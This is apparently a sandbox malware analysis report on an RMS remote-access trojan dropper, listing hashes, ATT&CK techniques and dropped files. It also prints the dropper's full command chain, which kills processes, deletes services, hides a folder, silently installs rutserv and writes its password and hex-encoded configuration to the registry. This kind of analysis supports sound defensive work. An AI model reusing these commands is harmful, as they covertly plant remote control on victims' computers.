rms | 3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3

Analysis

max time kernel
207s
max time network
224s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2022 12:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe
Size

2.8MB
MD5

9f8c4acc5a1b56b472d693b14a18ce10
SHA1

80361275f2d655895e6939f5a5ce4b7b40221a0c
SHA256

3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3
SHA512

b530e40e77c0d28370f5470c3b4c5587e39f7cc130177086bc36daa46faf6eeb74966e7b6ac103a833ada60c0d8df1d09916196c5d5204b01a9030ab8a6faf3c
SSDEEP

49152:QAJYxdPGHh9DdPAKcbOsFLMG3WazYYEW+lquVf8SwgmXH7Sb7rzDEjSmJ:7JYb0h0KcbLFLMbasYsGxHAjIjj

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 9 IoCs

pid	Process
1760	install.exe
3916	7z.exe
3032	ses.exe
3356	rutserv.exe
2452	rutserv.exe
3324	rutserv.exe
4248	rutserv.exe
2948	rfusclient.exe
1164	rfusclient.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
4008	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0009000000022e50-134.dat	upx
behavioral2/files/0x0009000000022e50-136.dat	upx
behavioral2/memory/1760-139-0x0000000000400000-0x0000000000759000-memory.dmp	upx

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	ses.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	install.exe

Loads dropped DLL 1 IoCs

pid	Process
3916	7z.exe

Drops file in Windows directory 38 IoCs

description	ioc	Process
File created	C:\Windows\spom\tmpE323.tmp	cmd.exe
File created	C:\Windows\spom\tmpE574.tmp	cmd.exe
File created	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\267c0e14-e082-4c8e-b884-726af602c259.tmp	cmd.exe
File created	C:\Windows\spom\a7bdbf36-2514-4d47-82c4-0a4bee5c8ae8.tmp	cmd.exe
File created	C:\Windows\spom\aria-debug-1404.log	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\rutserv.exe	cmd.exe
File created	C:\Windows\spom\sa.9NXQXXLFST89_0__.Public.InstallAgent.dat	cmd.exe
File created	C:\Windows\spom\wct5FC3.tmp	cmd.exe
File created	C:\Windows\spom\wctC90E.tmp	cmd.exe
File created	C:\Windows\spom\wct7D0F.tmp	cmd.exe
File created	C:\Windows\spom\AdobeSFX.log	cmd.exe
File created	C:\Windows\spom\b979706f-a9ef-4d07-92e8-ce62caf05b64.tmp	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI1716.txt	cmd.exe
File created	C:\Windows\spom\e6851ded-7841-4ea9-a1cb-be7c624c6623.tmp	cmd.exe
File created	C:\Windows\spom\ff5e6324-7f77-4f47-8801-ccc9bf320efe.tmp	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134339008.html	cmd.exe
File created	C:\Windows\spom\msedge_installer.log	cmd.exe
File created	C:\Windows\spom\b62e97c9-008b-4765-8200-c7894cc49bc1.tmp	cmd.exe
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI16EC.txt	cmd.exe
File created	C:\Windows\spom\install.exe	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File created	C:\Windows\spom\jawshtml.html	cmd.exe
File created	C:\Windows\spom\ses.exe	cmd.exe
File created	C:\Windows\spom\SOCAAGDT-20221111-1349a.log	cmd.exe
File created	C:\Windows\spom\wctE53.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI16EC.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI1716.txt	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\SOCAAGDT-20221111-1349.log	cmd.exe
File created	C:\Windows\spom\wctBA76.tmp	cmd.exe
File created	C:\Windows\spom\BroadcastMsg_1668174500.txt	cmd.exe
File created	C:\Windows\spom\3c989746-6848-40c9-8bea-8cfa05fee9fe.tmp	cmd.exe
File created	C:\Windows\spom\abd9bab3-7012-4320-95e3-1d9c1ea87502.tmp	cmd.exe
File created	C:\Windows\spom\wctE073.tmp	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3048	sc.exe
4664	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 2 IoCs

evasion

pid	Process
3968	taskkill.exe
2032	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3356	rutserv.exe
3356	rutserv.exe
3356	rutserv.exe
3356	rutserv.exe
3356	rutserv.exe
3356	rutserv.exe
2452	rutserv.exe
2452	rutserv.exe
3324	rutserv.exe
3324	rutserv.exe
4248	rutserv.exe
4248	rutserv.exe
4248	rutserv.exe
4248	rutserv.exe
4248	rutserv.exe
4248	rutserv.exe
1164	rfusclient.exe
1164	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	3356	rutserv.exe
Token: SeDebugPrivilege	3324	rutserv.exe
Token: SeTakeOwnershipPrivilege	4248	rutserv.exe
Token: SeTcbPrivilege	4248	rutserv.exe
Token: SeTcbPrivilege	4248	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2804 wrote to memory of 3392	2804	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	87
PID 2804 wrote to memory of 3392	2804	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	87
PID 2804 wrote to memory of 3392	2804	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	87
PID 3392 wrote to memory of 1760	3392	WScript.exe	88
PID 3392 wrote to memory of 1760	3392	WScript.exe	88
PID 3392 wrote to memory of 1760	3392	WScript.exe	88
PID 2804 wrote to memory of 1908	2804	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	89
PID 2804 wrote to memory of 1908	2804	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	89
PID 2804 wrote to memory of 1908	2804	3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe	89
PID 1760 wrote to memory of 1156	1760	install.exe	91
PID 1760 wrote to memory of 1156	1760	install.exe	91
PID 1760 wrote to memory of 1156	1760	install.exe	91
PID 1156 wrote to memory of 3916	1156	cmd.exe	95
PID 1156 wrote to memory of 3916	1156	cmd.exe	95
PID 1156 wrote to memory of 3916	1156	cmd.exe	95
PID 1156 wrote to memory of 3032	1156	cmd.exe	97
PID 1156 wrote to memory of 3032	1156	cmd.exe	97
PID 1156 wrote to memory of 3032	1156	cmd.exe	97
PID 3032 wrote to memory of 5000	3032	ses.exe	98
PID 3032 wrote to memory of 5000	3032	ses.exe	98
PID 3032 wrote to memory of 5000	3032	ses.exe	98
PID 5000 wrote to memory of 3968	5000	cmd.exe	100
PID 5000 wrote to memory of 3968	5000	cmd.exe	100
PID 5000 wrote to memory of 3968	5000	cmd.exe	100
PID 5000 wrote to memory of 2032	5000	cmd.exe	101
PID 5000 wrote to memory of 2032	5000	cmd.exe	101
PID 5000 wrote to memory of 2032	5000	cmd.exe	101
PID 5000 wrote to memory of 3396	5000	cmd.exe	102
PID 5000 wrote to memory of 3396	5000	cmd.exe	102
PID 5000 wrote to memory of 3396	5000	cmd.exe	102
PID 3396 wrote to memory of 1428	3396	net.exe	103
PID 3396 wrote to memory of 1428	3396	net.exe	103
PID 3396 wrote to memory of 1428	3396	net.exe	103
PID 5000 wrote to memory of 4220	5000	cmd.exe	104
PID 5000 wrote to memory of 4220	5000	cmd.exe	104
PID 5000 wrote to memory of 4220	5000	cmd.exe	104
PID 4220 wrote to memory of 760	4220	net.exe	105
PID 4220 wrote to memory of 760	4220	net.exe	105
PID 4220 wrote to memory of 760	4220	net.exe	105
PID 5000 wrote to memory of 3048	5000	cmd.exe	106
PID 5000 wrote to memory of 3048	5000	cmd.exe	106
PID 5000 wrote to memory of 3048	5000	cmd.exe	106
PID 5000 wrote to memory of 4664	5000	cmd.exe	107
PID 5000 wrote to memory of 4664	5000	cmd.exe	107
PID 5000 wrote to memory of 4664	5000	cmd.exe	107
PID 5000 wrote to memory of 4004	5000	cmd.exe	108
PID 5000 wrote to memory of 4004	5000	cmd.exe	108
PID 5000 wrote to memory of 4004	5000	cmd.exe	108
PID 5000 wrote to memory of 4008	5000	cmd.exe	109
PID 5000 wrote to memory of 4008	5000	cmd.exe	109
PID 5000 wrote to memory of 4008	5000	cmd.exe	109
PID 5000 wrote to memory of 3356	5000	cmd.exe	111
PID 5000 wrote to memory of 3356	5000	cmd.exe	111
PID 5000 wrote to memory of 3356	5000	cmd.exe	111
PID 5000 wrote to memory of 2452	5000	cmd.exe	116
PID 5000 wrote to memory of 2452	5000	cmd.exe	116
PID 5000 wrote to memory of 2452	5000	cmd.exe	116
PID 5000 wrote to memory of 5088	5000	cmd.exe	118
PID 5000 wrote to memory of 5088	5000	cmd.exe	118
PID 5000 wrote to memory of 5088	5000	cmd.exe	118
PID 5000 wrote to memory of 4944	5000	cmd.exe	119
PID 5000 wrote to memory of 4944	5000	cmd.exe	119
PID 5000 wrote to memory of 4944	5000	cmd.exe	119
PID 5000 wrote to memory of 4824	5000	cmd.exe	120

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4008	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe
"C:\Users\Admin\AppData\Local\Temp\3d5a13dea83c760966a300e15bdde47920600ff6a5cbe8eaf6aaf4a25679f4a3.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2804
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\stop.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3392
- - C:\Users\Admin\AppData\Local\Temp\install.exe
    "C:\Users\Admin\AppData\Local\Temp\install.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\new.bat" "
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1156
    - - C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\7z.exe
        
        7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3916
    - - C:\Users\Admin\AppData\Local\Temp\ses.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ses.exe" -p
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3032
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2B03.tmp\ses.bat" -p "
        6⤵
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:5000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rfusclient.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3968
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rutserv.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
        
        C:\Windows\SysWOW64\net.exe
        
        net stop netaservice
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3396
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop netaservice
        8⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\net.exe
        
        net stop rmanservice
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4220
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop rmanservice
        8⤵
        
        PID:760
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete netaservice
        7⤵
        Launches sc.exe
        
        PID:3048
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete rmanservice
        7⤵
        Launches sc.exe
        
        PID:4664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        7⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Windows\spom"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /silentinstall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /firewall
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2452
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
        7⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
        7⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003500360030003000360022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
        7⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70090c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736509055369644964061034313934382e38323736333832363339084c6963656e73657306ce524d532d5a2d35303931623845366536346134624633363931333344344634363561383563306269593253326459586c52664477776e493233696c6848676f4f4350344f6d6436654b4734594c69674130664a794e74446c5246446c52435646554e4c6a395453304a5a5551776558435a7a623174634477454542516b4a593346385731775044465a454477426e5947494446514d4141775275416d4a33594151434241634f4831564562484577584577504151494d486c4d384f57304f4631705653323959586a516962513d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223536303036223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
        7⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e007600610072006f006e0069006e006100320035004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00310033003700410041003900460039002d0042003500440046002d0034003200360043002d0042003900420042002d004600330041003600340036004100330034003300350032007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
        7⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
        7⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
        7⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /start
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
  2⤵
  PID:1908

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4248
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1164

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2B03.tmp\ses.bat

Filesize
10KB

MD5
ff2e3f863425a94791b58f250288d69f

SHA1
d88abcad2e8040895720c206c81b189b85d1825d

SHA256
4d5fdfbab9114a36b3660466f4c6e78c8b3778a305b110befe784401d807dfd3

SHA512
a3c7711be9fcbee9aaed31e0b8686dd9d6e91dcd01b1b506e808eac299ae25343f061c12403bb65f14d99fc1306e2d1202c040f8cc81608a2dead863e19947e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

Filesize
300B

MD5
435256bce54fcee85ccf835b17d98ffe

SHA1
e62f15e6ef8c251cfb4fb59823c795eb2c93afd4

SHA256
4efc86e4ba3a8aef924cf4b2028971dd416410b5880206d270146b7174278b3e

SHA512
e9ae0661e1a35e5012983714b00d1df114a16c9a6a701a3a2ceb36b8dba313be31700195dbf3d9c4bc5369ee281b73629c92049b70206685a01f76b62af53c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\7z.dll

Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\7z.dll

Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\Sys.7z

Filesize
2.2MB

MD5
8773672b026eedd00829ef5e9d07fb16

SHA1
b193f49182cc95fd0b451814ac949f36eecd2292

SHA256
9e56307aa54b8f50816fd7ed4a0fd44c454aebd34f694607fc19e5251c33590e

SHA512
421997f31703c5ae4ba68adaaec1f0377332ecaeb8d6acac57d5ebb6f79e044c7bc7784b7f70acbdf180aacac0b36a8e53eed7caa861daa7628b62e4f5097684

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3EA.tmp\new.bat

Filesize
65B

MD5
13310849fd8d70c608fd7b02fa86eea5

SHA1
